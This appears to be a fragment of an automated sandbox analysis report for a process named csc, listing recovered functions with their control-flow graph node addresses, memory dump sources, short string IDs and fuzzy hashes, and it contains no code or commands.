                                                                                                                                                      control_flow_graph 1204 9366ec0-9366ee8 1206 9366f36-9366f44 1204->1206 1207 9366eea-9366f31 1204->1207 1208 9366f46-9366f51 call 9363e48 1206->1208 1209 9366f53 1206->1209 1255 936738d-9367394 1207->1255 1210 9366f55-9366f5c 1208->1210 1209->1210 1213 9367045-9367049 1210->1213 1214 9366f62-9366f66 1210->1214 1218 936709f-93670a9 1213->1218 1219 936704b-936705a call 93622e8 1213->1219 1216 9367395-93673bd 1214->1216 1217 9366f6c-9366f70 1214->1217 1227 93673c4-93673ee 1216->1227 1221 9366f82-9366fe0 call 9363b88 call 9365570 1217->1221 1222 9366f72-9366f7c 1217->1222 1223 93670e2-9367108 1218->1223 1224 93670ab-93670ba call 93617e8 1218->1224 1235 936705e-9367063 1219->1235 1266 9366fe6-9367040 1221->1266 1267 9367453-9367468 1221->1267 1222->1221 1222->1227 1248 9367115 1223->1248 1249 936710a-9367113 1223->1249 1238 93673f6-936740c 1224->1238 1239 93670c0-93670dd 1224->1239 1227->1238 1240 9367065-936709a call 9366988 1235->1240 1241 936705c 1235->1241 1264 9367414-936744c 1238->1264 1239->1255 1240->1255 1241->1235 1256 9367117-936713f 1248->1256 1249->1256 1271 9367145-936715e 1256->1271 1272 9367210-9367214 1256->1272 1264->1267 1266->1255 1271->1272 1294 9367164-9367173 call 9361780 1271->1294 1274 9367216-936722f 1272->1274 1275 936728e-9367298 1272->1275 1274->1275 1299 9367231-9367240 call 9361780 1274->1299 1278 93672f5-93672fe 1275->1278 1279 936729a-93672a4 1275->1279 1281 9367336-9367383 1278->1281 1282 9367300-936732e call 9363380 call 93633a0 1278->1282 1292 93672a6-93672a8 1279->1292 1293 93672aa-93672bc 1279->1293 1305 936738b 1281->1305 1282->1281 1295 93672be-93672c0 1292->1295 1293->1295 1307 9367175-936717b 1294->1307 1308 936718b-93671a0 1294->1308 1303 93672c2-93672c6 1295->1303 1304 93672ee-93672f3 1295->1304 1321 9367242-9367248 1299->1321 1322 9367258-9367263 1299->1322 1310 93672e4-93672e9 call 9360580 1303->1310 1311 93672c8-93672e1 1303->1311 1304->1278 1304->1279 1305->1255 1314 936717f-9367181 1307->1314 1315 936717d 1307->1315 1318 93671d4-93671dd 1308->1318 1319 93671a2-93671ce call 93624c0 1308->1319 1310->1304 1311->1310 1314->1308 1315->1308 1318->1267 1328 93671e3-936720a 1318->1328 1319->1264 1319->1318 1323 936724c-936724e 1321->1323 1324 936724a 1321->1324 1322->1267 1325 9367269-936728c 1322->1325 1323->1322 1324->1322 1325->1275 1325->1299 1328->1272 1328->1294
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047259661.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9360000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: Haq$Haq$Haq
                                                                                                                                                      • API String ID: 0-3013282719
                                                                                                                                                      • Opcode ID: ce27645bad791f91cdd840158daa83e5c56582ef20c6ceae57093fef7cb01aa7
                                                                                                                                                      • Instruction ID: c09377e8dcc57935bd8797364d280620e2717f27f253942e64a0a5017cf6d7e5
                                                                                                                                                      • Opcode Fuzzy Hash: ce27645bad791f91cdd840158daa83e5c56582ef20c6ceae57093fef7cb01aa7
                                                                                                                                                      • Instruction Fuzzy Hash: 6A025B30A00605CFDB25EFA5C8946AEB7F2FF88304F648529E5469B764DB31AC46CF91
                                                                                                                                                      Function 09368780 Relevance: 4.1, Strings: 3, Instructions: 370COMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 1339 9368780-93687bd call 9368ca0 1341 93687df-93687f5 call 9368588 1339->1341 1342 93687bf-93687c2 1339->1342 1348 9368b6b-9368b7f 1341->1348 1349 93687fb-9368807 1341->1349 1455 93687c4 call 93690f0 1342->1455 1456 93687c4 call 9369098 1342->1456 1344 93687ca-93687cc 1344->1341 1346 93687ce-93687d6 1344->1346 1346->1341 1358 9368bbf-9368bc8 1348->1358 1350 936880d-9368810 1349->1350 1351 9368938-936893f 1349->1351 1355 9368813-936881c 1350->1355 1352 9368945-936894e 1351->1352 1353 9368a6e-9368aab call 9367f90 call 936ae78 1351->1353 1352->1353 1356 9368954-9368a60 call 9367f90 call 9368520 call 9367f90 1352->1356 1397 9368ab1-9368b62 call 9367f90 1353->1397 1359 9368822-9368836 1355->1359 1360 9368c60 1355->1360 1450 9368a62 1356->1450 1451 9368a6b-9368a6c 1356->1451 1363 9368b8d-9368b96 1358->1363 1364 9368bca-9368bd1 1358->1364 1372 936883c-93688d1 call 9368588 * 2 call 9367f90 call 9368520 call 93685c8 call 9368670 call 93686d8 1359->1372 1373 9368928-9368932 1359->1373 1362 9368c65-9368c69 1360->1362 1367 9368c74 1362->1367 1368 9368c6b 1362->1368 1363->1360 1365 9368b9c-9368bae 1363->1365 1370 9368bd3-9368c16 call 9367f90 1364->1370 1371 9368c1f-9368c26 1364->1371 1384 9368bb0-9368bb5 1365->1384 1385 9368bbe 1365->1385 1381 9368c75 1367->1381 1368->1367 1370->1371 1374 9368c4b-9368c5e 1371->1374 1375 9368c28-9368c38 1371->1375 1430 93688d3-93688eb call 9368670 call 9367f90 call 9368240 1372->1430 1431 93688f0-9368923 call 93686d8 1372->1431 1373->1351 1373->1355 1374->1362 1375->1374 1391 9368c3a-9368c42 1375->1391 1381->1381 1457 9368bb8 call 936b618 1384->1457 1458 9368bb8 call 936b608 1384->1458 1385->1358 1391->1374 1397->1348 1430->1431 1431->1373 1450->1451 1451->1353 1455->1344 1456->1344 1457->1385 1458->1385
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047259661.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9360000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: 4']q$4']q$4']q
                                                                                                                                                      • API String ID: 0-705557208
                                                                                                                                                      • Opcode ID: f9e99522db68b25727695de2edff098fc276d0eb30df93d82279425a94aac7fd
                                                                                                                                                      • Instruction ID: b2487fc9f02778b644f62a4d6cee8378e7cfb143587d17c48a759f3df84b1852
                                                                                                                                                      • Opcode Fuzzy Hash: f9e99522db68b25727695de2edff098fc276d0eb30df93d82279425a94aac7fd
                                                                                                                                                      • Instruction Fuzzy Hash: 6DF1BB34A10218DFCB08EFA4D998A9DBBB2FF88304F158559E506AB365DB71EC42CF51
                                                                                                                                                      Function 0936E488 Relevance: 4.1, Strings: 3, Instructions: 366COMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 1459 936e488-936e4a8 1460 936e5c1-936e5e6 1459->1460 1461 936e4ae-936e4b2 1459->1461 1462 936e5ed-936e612 1460->1462 1461->1462 1463 936e4b8-936e4c1 1461->1463 1465 936e619-936e64f 1462->1465 1464 936e4c7-936e4ee 1463->1464 1463->1465 1475 936e5b6-936e5c0 1464->1475 1476 936e4f4-936e4f6 1464->1476 1481 936e656-936e6ac 1465->1481 1478 936e517-936e519 1476->1478 1479 936e4f8-936e4fb 1476->1479 1483 936e51c-936e520 1478->1483 1479->1481 1482 936e501-936e50b 1479->1482 1500 936e6d0-936e6e7 1481->1500 1501 936e6ae-936e6c2 1481->1501 1482->1481 1484 936e511-936e515 1482->1484 1486 936e522-936e531 1483->1486 1487 936e581-936e58d 1483->1487 1484->1478 1484->1483 1486->1481 1494 936e537-936e57e call 93605b0 1486->1494 1487->1481 1488 936e593-936e5b0 call 93605b0 1487->1488 1488->1475 1488->1476 1494->1487 1511 936e7d7-936e7e7 1500->1511 1512 936e6ed-936e7d2 call 9368588 call 9367f90 call 936d690 call 9367f90 call 93685c8 call 936c618 call 9367f90 call 936ae78 call 9368e30 1500->1512 1578 936e6c5 call 936ec80 1501->1578 1579 936e6c5 call 936eba8 1501->1579 1580 936e6c5 call 936ed08 1501->1580 1507 936e6cb 1509 936e8f9-936e904 1507->1509 1517 936e906-936e916 1509->1517 1518 936e933-936e954 call 93686d8 1509->1518 1520 936e8d4-936e8f0 call 9367f90 1511->1520 1521 936e7ed-936e8c6 call 9368588 * 2 call 9368d40 call 9367f90 call 936d690 call 9367f90 call 9368240 call 93686d8 call 9367f90 1511->1521 1512->1511 1533 936e926-936e92e call 9368e30 1517->1533 1534 936e918-936e91e 1517->1534 1520->1509 1575 936e8d1 1521->1575 1576 936e8c8 1521->1576 1533->1518 1534->1533 1575->1520 1576->1575 1578->1507 1579->1507 1580->1507
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047259661.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9360000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: (aq$(aq$Haq
                                                                                                                                                      • API String ID: 0-2456560092
                                                                                                                                                      • Opcode ID: 47855bf9704b974bcd2392c4a96564fc38c73e0925c3f23f22448524f9bbb8a9
                                                                                                                                                      • Instruction ID: 867271a16bd6cd15a183fd1a9f5d4971d0c11c985a262fb9a9019d76b4713522
                                                                                                                                                      • Opcode Fuzzy Hash: 47855bf9704b974bcd2392c4a96564fc38c73e0925c3f23f22448524f9bbb8a9
                                                                                                                                                      • Instruction Fuzzy Hash: 71E13F34A00209DFCB14EFA4D49499EBBB2EF89314F50C569E906AB365DB30EC46CF91
                                                                                                                                                      Function 06B00078 Relevance: 3.1, Strings: 2, Instructions: 597COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4045988407.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_6b00000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: 4']q$4']q
                                                                                                                                                      • API String ID: 0-3120983240
                                                                                                                                                      • Opcode ID: 58e46998d41605116409e55f56cb50937e9083b39f692ed1e8b118f26a385576
                                                                                                                                                      • Instruction ID: 3e89e8282fa5fa381601f7f48bfe97c66a941cfc377c08126cee8718953da1d1
                                                                                                                                                      • Opcode Fuzzy Hash: 58e46998d41605116409e55f56cb50937e9083b39f692ed1e8b118f26a385576
                                                                                                                                                      • Instruction Fuzzy Hash: 5E02DDB4F402168BFBB53669296573B2D97EBC8645F0550ACDA06DB3C4DE20EC4287E3
                                                                                                                                                      Function 09362811 Relevance: 3.0, Strings: 2, Instructions: 528COMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 1852 9362811-9362846 1853 9362857-9362860 1852->1853 1854 9362848-9362855 1852->1854 1854->1853 1855 9362863-9362870 1854->1855 1856 9362872-9362879 1855->1856 1857 936287b 1855->1857 1858 9362882-93628ac 1856->1858 1857->1858 1859 93628b5-93628c8 call 9362500 1858->1859 1860 93628ae 1858->1860 1863 93628ce-93628e1 1859->1863 1864 9362a0c-9362a13 1859->1864 1860->1859 1870 93628e3-93628ea 1863->1870 1871 93628ef-9362909 1863->1871 1865 9362cad-9362cb4 1864->1865 1866 9362a19-9362a2e 1864->1866 1868 9362cb6-9362cbf 1865->1868 1869 9362d23-9362d2a 1865->1869 1876 9362a30-9362a32 1866->1876 1877 9362a4e-9362a54 1866->1877 1868->1869 1874 9362cc1-9362cd4 1868->1874 1872 9362dc6-9362dcd 1869->1872 1873 9362d30-9362d39 1869->1873 1878 9362a05 1870->1878 1894 9362910-936291d 1871->1894 1895 936290b-936290e 1871->1895 1880 9362dcf-9362de0 1872->1880 1881 9362de9-9362def 1872->1881 1873->1872 1879 9362d3f-9362d52 1873->1879 1874->1869 1890 9362cd6-9362d1b 1874->1890 1876->1877 1883 9362a34-9362a4b 1876->1883 1886 9362b1c-9362b20 1877->1886 1887 9362a5a-9362a5c 1877->1887 1878->1864 1902 9362d54-9362d63 1879->1902 1903 9362d65-9362d69 1879->1903 1880->1881 1898 9362de2 1880->1898 1884 9362e01-9362e0a 1881->1884 1885 9362df1-9362df7 1881->1885 1883->1877 1891 9362e0d-9362e82 1885->1891 1892 9362df9-9362dff 1885->1892 1886->1865 1896 9362b26-9362b28 1886->1896 1887->1886 1893 9362a62-9362a7c 1887->1893 1890->1869 1932 9362d1d-9362d20 1890->1932 1965 9362e84-9362e8e 1891->1965 1966 9362e90 1891->1966 1892->1884 1892->1891 1919 9362a84-9362ae3 1893->1919 1900 936291f-9362933 1894->1900 1895->1900 1896->1865 1901 9362b2e-9362b37 1896->1901 1898->1881 1900->1878 1925 9362939-936298d 1900->1925 1910 9362c8a-9362c90 1901->1910 1902->1903 1904 9362d6b-9362d6d 1903->1904 1905 9362d89-9362d8b 1903->1905 1904->1905 1912 9362d6f-9362d86 1904->1912 1905->1872 1913 9362d8d-9362d93 1905->1913 1914 9362c92-9362ca1 1910->1914 1915 9362ca3 1910->1915 1912->1905 1913->1872 1918 9362d95-9362dc3 1913->1918 1921 9362ca5-9362ca7 1914->1921 1915->1921 1918->1872 1959 9362ae5-9362af7 1919->1959 1960 9362afa-9362b19 1919->1960 1921->1865 1924 9362b3c-9362b4a call 9361780 1921->1924 1933 9362b62-9362b7c 1924->1933 1934 9362b4c-9362b52 1924->1934 1968 936298f-9362991 1925->1968 1969 936299b-936299f 1925->1969 1932->1869 1933->1910 1945 9362b82-9362b86 1933->1945 1939 9362b56-9362b58 1934->1939 1940 9362b54 1934->1940 1939->1933 1940->1933 1949 9362ba7 1945->1949 1950 9362b88-9362b91 1945->1950 1953 9362baa-9362bc4 1949->1953 1951 9362b93-9362b96 1950->1951 1952 9362b98-9362b9b 1950->1952 1957 9362ba5 1951->1957 1952->1957 1953->1910 1970 9362bca-9362c4b 1953->1970 1957->1953 1959->1960 1960->1886 1971 9362e95-9362e97 1965->1971 1966->1971 1968->1969 1969->1878 1972 93629a1-93629b9 1969->1972 1994 9362c62-9362c88 1970->1994 1995 9362c4d-9362c5f 1970->1995 1973 9362e9e-9362ea3 1971->1973 1974 9362e99-9362e9c 1971->1974 1972->1878 1978 93629bb-93629c7 1972->1978 1977 9362ea9-9362ed6 1973->1977 1974->1977 1980 93629d6-93629dc 1978->1980 1981 93629c9-93629cc 1978->1981 1983 93629e4-93629ed 1980->1983 1984 93629de-93629e1 1980->1984 1981->1980 1986 93629ef-93629f2 1983->1986 1987 93629fc-9362a02 1983->1987 1984->1983 1986->1987 1987->1878 1994->1865 1994->1910 1995->1994
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047259661.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9360000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: $]q$$]q
                                                                                                                                                      • API String ID: 0-127220927
                                                                                                                                                      • Opcode ID: 75ea1fff08afd4284b530f842e6e52adfec7aa0d3a76f0be98b9bb9d9633865f
                                                                                                                                                      • Instruction ID: 90667578c155a36f78424a97ff199e05171a839f01768d4e44587bd276e542b0
                                                                                                                                                      • Opcode Fuzzy Hash: 75ea1fff08afd4284b530f842e6e52adfec7aa0d3a76f0be98b9bb9d9633865f
                                                                                                                                                      • Instruction Fuzzy Hash: 38226C35A002198FCB15DFA4C855AAEBBB2FF58710F168015E851E73A4DB78AE43CF91
                                                                                                                                                      Function 09366570 Relevance: 2.8, Strings: 2, Instructions: 347COMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 1998 9366570-9366582 1999 9366584-93665a5 1998->1999 2000 93665ac-93665b0 1998->2000 1999->2000 2001 93665b2-93665b4 2000->2001 2002 93665bc-93665cb 2000->2002 2001->2002 2003 93665d7-9366603 2002->2003 2004 93665cd 2002->2004 2008 9366830-9366877 2003->2008 2009 9366609-936660f 2003->2009 2004->2003 2040 936688d-9366899 2008->2040 2041 9366879 2008->2041 2010 9366615-936661b 2009->2010 2011 93666e1-93666e5 2009->2011 2010->2008 2014 9366621-936662e 2010->2014 2015 93666e7-93666f0 2011->2015 2016 9366708-9366711 2011->2016 2017 9366634-936663d 2014->2017 2018 93666c0-93666c9 2014->2018 2015->2008 2019 93666f6-9366706 2015->2019 2020 9366736-9366739 2016->2020 2021 9366713-9366733 2016->2021 2017->2008 2025 9366643-936665b 2017->2025 2018->2008 2024 93666cf-93666db 2018->2024 2023 936673c-9366742 2019->2023 2020->2023 2021->2020 2023->2008 2027 9366748-936675b 2023->2027 2024->2010 2024->2011 2028 9366667-9366679 2025->2028 2029 936665d 2025->2029 2027->2008 2031 9366761-9366771 2027->2031 2028->2018 2035 936667b-9366681 2028->2035 2029->2028 2031->2008 2034 9366777-9366784 2031->2034 2034->2008 2037 936678a-936679f 2034->2037 2038 9366683 2035->2038 2039 936668d-9366693 2035->2039 2037->2008 2049 93667a5-93667c8 2037->2049 2038->2039 2039->2008 2042 9366699-93666bd 2039->2042 2045 93668a5-93668c1 2040->2045 2046 936689b 2040->2046 2043 936687c-936687e 2041->2043 2047 93668c2-93668c9 2043->2047 2048 9366880-936688b 2043->2048 2046->2045 2047->2041 2055 93668cb-93668ef call 9361780 2047->2055 2048->2040 2048->2043 2049->2008 2056 93667ca-93667d5 2049->2056 2062 9366907-9366909 2055->2062 2063 93668f1-93668f7 2055->2063 2057 9366826-936682d 2056->2057 2058 93667d7-93667e1 2056->2058 2058->2057 2064 93667e3-93667f9 2058->2064 2085 936690b call 9367b50 2062->2085 2086 936690b call 9366988 2062->2086 2065 93668fb-93668fd 2063->2065 2066 93668f9 2063->2066 2071 9366805-936681e 2064->2071 2072 93667fb 2064->2072 2065->2062 2066->2062 2067 9366911-9366915 2068 9366917-936692e 2067->2068 2069 9366960-9366970 2067->2069 2068->2069 2077 9366930-936693a 2068->2077 2071->2057 2072->2071 2080 936693c-936694b 2077->2080 2081 936694d-936695d 2077->2081 2080->2081 2085->2067 2086->2067
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047259661.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9360000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: (aq$d
                                                                                                                                                      • API String ID: 0-3557608343
                                                                                                                                                      • Opcode ID: f942e95b7beecf6fce1e9c1cd742f6c7d18dab7f3a0904a638a5fcf8e0caf7db
                                                                                                                                                      • Instruction ID: e4dcf8a612a67f5267fe2f49d88d41d930193d9334938baa8853aa4963b686dd
                                                                                                                                                      • Opcode Fuzzy Hash: f942e95b7beecf6fce1e9c1cd742f6c7d18dab7f3a0904a638a5fcf8e0caf7db
                                                                                                                                                      • Instruction Fuzzy Hash: 40D16B346006068FCB14DF68C48496ABBF2FF88358B15C569E85A9B765DB30FC46CF90
                                                                                                                                                      Function 09363B88 Relevance: 2.8, Strings: 2, Instructions: 290COMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 2087 9363b88-9363ba2 2088 9363ba4-9363bab 2087->2088 2089 9363bae-9363bba 2087->2089 2091 9363c16-9363c19 2089->2091 2092 9363bbc-9363bc9 2089->2092 2093 9363c2c-9363c2f 2091->2093 2094 9363c1b-9363c1d 2091->2094 2101 9363de7-9363e1f 2092->2101 2102 9363bcf-9363bff 2092->2102 2096 9363c55-9363c58 2093->2096 2097 9363c31-9363c4f 2093->2097 2100 9363c25 2094->2100 2098 9363c5e-9363c64 2096->2098 2099 9363ddd-9363de4 2096->2099 2097->2096 2105 9363e26-9363e71 2097->2105 2098->2099 2104 9363c6a-9363c73 2098->2104 2100->2093 2101->2105 2128 9363c01-9363c0a 2102->2128 2129 9363c0c-9363c0f 2102->2129 2111 9363c75-9363c84 2104->2111 2112 9363cab-9363cb1 2104->2112 2135 9363e73-9363e80 2105->2135 2136 9363eaa-9363eac 2105->2136 2111->2112 2122 9363c86-9363c9f 2111->2122 2114 9363cb7-9363cc0 2112->2114 2115 9363dbc-9363dc2 2112->2115 2114->2115 2124 9363cc6-9363cd2 2114->2124 2115->2099 2119 9363dc4-9363dd4 2115->2119 2119->2099 2131 9363dd6-9363ddb 2119->2131 2122->2112 2134 9363ca1-9363ca4 2122->2134 2137 9363d70-9363db4 2124->2137 2138 9363cd8-9363d00 2124->2138 2128->2091 2129->2091 2131->2099 2134->2112 2135->2136 2143 9363e82-9363ea8 2135->2143 2139 93642f7-93642fe 2136->2139 2137->2115 2138->2137 2150 9363d02-9363d3f 2138->2150 2143->2136 2155 9363eb1-9363ee5 2143->2155 2150->2137 2161 9363d41-9363d6e 2150->2161 2163 9363eeb-9363ef4 2155->2163 2164 9363f88-9363f97 2155->2164 2161->2115 2165 93642ff 2163->2165 2166 9363efa-9363f0d 2163->2166 2172 9363fd6 2164->2172 2173 9363f99-9363faf 2164->2173 2170 9364302-9364324 2165->2170 2175 9363f76-9363f82 2166->2175 2176 9363f0f-9363f28 2166->2176 2170->2170 2177 9364326 2170->2177 2174 9363fd8-9363fdd 2172->2174 2183 9363fb1-9363fcd 2173->2183 2184 9363fcf-9363fd4 2173->2184 2178 9364020-936403c 2174->2178 2179 9363fdf-9364000 2174->2179 2175->2163 2175->2164 2176->2175 2194 9363f2a-9363f38 2176->2194 2188 9364104-936410d 2178->2188 2189 9364042-936404b 2178->2189 2179->2178 2200 9364002 2179->2200 2183->2174 2184->2174 2195 93642f5 2188->2195 2196 9364113 2188->2196 2189->2165 2192 9364051-936406e 2189->2192 2220 9364074-936408a 2192->2220 2221 93640f2-93640fe 2192->2221 2194->2175 2208 9363f3a-9363f3e 2194->2208 2195->2139 2197 9364121-936412f call 9361780 2196->2197 2198 936417e-936418c call 9361780 2196->2198 2199 936411a-936411c 2196->2199 2209 9364147-936414a 2197->2209 2210 9364131-9364137 2197->2210 2211 93641a4-93641a7 2198->2211 2212 936418e-9364194 2198->2212 2199->2139 2204 9364005-936401e 2200->2204 2204->2178 2208->2165 2215 9363f44-9363f5d 2208->2215 2222 9364153-9364161 call 9361780 2209->2222 2223 936414c-936414e 2209->2223 2216 936413b-936413d 2210->2216 2217 9364139 2210->2217 2224 93641ad-93641bb call 9361780 2211->2224 2225 9364238-9364249 call 9361780 2211->2225 2218 9364196 2212->2218 2219 9364198-936419a 2212->2219 2215->2175 2241 9363f5f-9363f73 call 93605b0 2215->2241 2216->2209 2217->2209 2218->2211 2219->2211 2220->2221 2253 936408c-936409a 2220->2253 2221->2188 2221->2189 2237 9364163-9364169 2222->2237 2238 9364179 2222->2238 2223->2139 2239 93641d3-93641e6 call 9361780 2224->2239 2240 93641bd-93641c3 2224->2240 2235 9364261-9364264 2225->2235 2236 936424b-9364251 2225->2236 2235->2195 2246 936426a-936427b call 9361780 2235->2246 2243 9364255-9364257 2236->2243 2244 9364253 2236->2244 2247 936416d-936416f 2237->2247 2248 936416b 2237->2248 2238->2139 2256 93641fe-936420b 2239->2256 2257 93641e8-93641ee 2239->2257 2249 93641c7-93641c9 2240->2249 2250 93641c5 2240->2250 2241->2175 2243->2235 2244->2235 2262 9364293-93642a3 call 9361780 2246->2262 2263 936427d-9364283 2246->2263 2247->2238 2248->2238 2249->2239 2250->2239 2253->2221 2267 936409c-93640a0 2253->2267 2256->2225 2271 936420d-936421b call 9361780 2256->2271 2259 93641f2-93641f4 2257->2259 2260 93641f0 2257->2260 2259->2256 2260->2256 2273 93642a5-93642ab 2262->2273 2274 93642bb-93642c8 2262->2274 2268 9364287-9364289 2263->2268 2269 9364285 2263->2269 2267->2165 2272 93640a6-93640cf 2267->2272 2268->2262 2269->2262 2281 9364233 2271->2281 2282 936421d-9364223 2271->2282 2272->2221 2290 93640d1-93640ef call 93605b0 2272->2290 2277 93642af-93642b1 2273->2277 2278 93642ad 2273->2278 2274->2195 2284 93642ca-93642db call 9361780 2274->2284 2277->2274 2278->2274 2281->2139 2285 9364227-9364229 2282->2285 2286 9364225 2282->2286 2291 93642f3 2284->2291 2292 93642dd-93642e3 2284->2292 2285->2281 2286->2281 2290->2221 2291->2139 2293 93642e7-93642e9 2292->2293 2294 93642e5 2292->2294 2293->2291 2294->2291
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047259661.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9360000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: Pl]q$$]q
                                                                                                                                                      • API String ID: 0-2369359564
                                                                                                                                                      • Opcode ID: 0d5ac967bc9ba707965ccc50af73423ae929cfd8b178a2babe980effd5cf75bb
                                                                                                                                                      • Instruction ID: 6d9e4b00c699a29373e548c236bc3a655e0d61e94560feb14d1e95cf64095cf2
                                                                                                                                                      • Opcode Fuzzy Hash: 0d5ac967bc9ba707965ccc50af73423ae929cfd8b178a2babe980effd5cf75bb
                                                                                                                                                      • Instruction Fuzzy Hash: 91B11874B001098FDB14EF69C894A6A7BF6FF89710B1180A9E506CB3B5DB71EC41CBA1
                                                                                                                                                      Function 0936B8B8 Relevance: 2.8, Strings: 2, Instructions: 289COMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 2299 936b8b8-936b959 call 9368ca0 call 9368d40 2310 936b962-936b9a4 call 9368d40 2299->2310 2311 936b95b-936b960 2299->2311 2312 936b9a7-936b9b1 2310->2312 2311->2312 2314 936b9b7-936baae call 936ae78 call 9367f90 call 936ae78 call 9368e30 call 936ae78 2312->2314 2315 936bab3-936bb8f call 936b6a0 call 936ae78 call 9368e30 call 9368588 * 2 call 93686d8 call 936b6a0 call 936ae78 2312->2315 2314->2315 2364 936bb91-936bbbd 2315->2364 2365 936bbca-936bbcf 2315->2365 2364->2365 2378 936bbbf-936bbc5 call 9368240 2364->2378 2387 936bbd2 call 936b618 2365->2387 2388 936bbd2 call 936b608 2365->2388 2367 936bbd8-936bc35 call 936b6a0 call 936ae78 call 93685c8 2384 936bc37 2367->2384 2385 936bc40 2367->2385 2378->2365 2384->2385 2386 936bc41 2385->2386 2386->2386 2387->2367 2388->2367
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047259661.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9360000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: 4']q$4']q
                                                                                                                                                      • API String ID: 0-3120983240
                                                                                                                                                      • Opcode ID: 1903b54c5357605485c36e3b7cd960909de3498109e1f62e63c16b4107cbb7cd
                                                                                                                                                      • Instruction ID: 88e0da272d58a1c5973f2dc1597334dc30064b6e4ca9ee9eb3584bbf78932743
                                                                                                                                                      • Opcode Fuzzy Hash: 1903b54c5357605485c36e3b7cd960909de3498109e1f62e63c16b4107cbb7cd
                                                                                                                                                      • Instruction Fuzzy Hash: BAC1A675A00218DFCB04EFA8C994A9DB7B6FF89304F118169E506AB3A5DB71EC42CF51
                                                                                                                                                      Function 0936B8A8 Relevance: 2.8, Strings: 2, Instructions: 278COMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
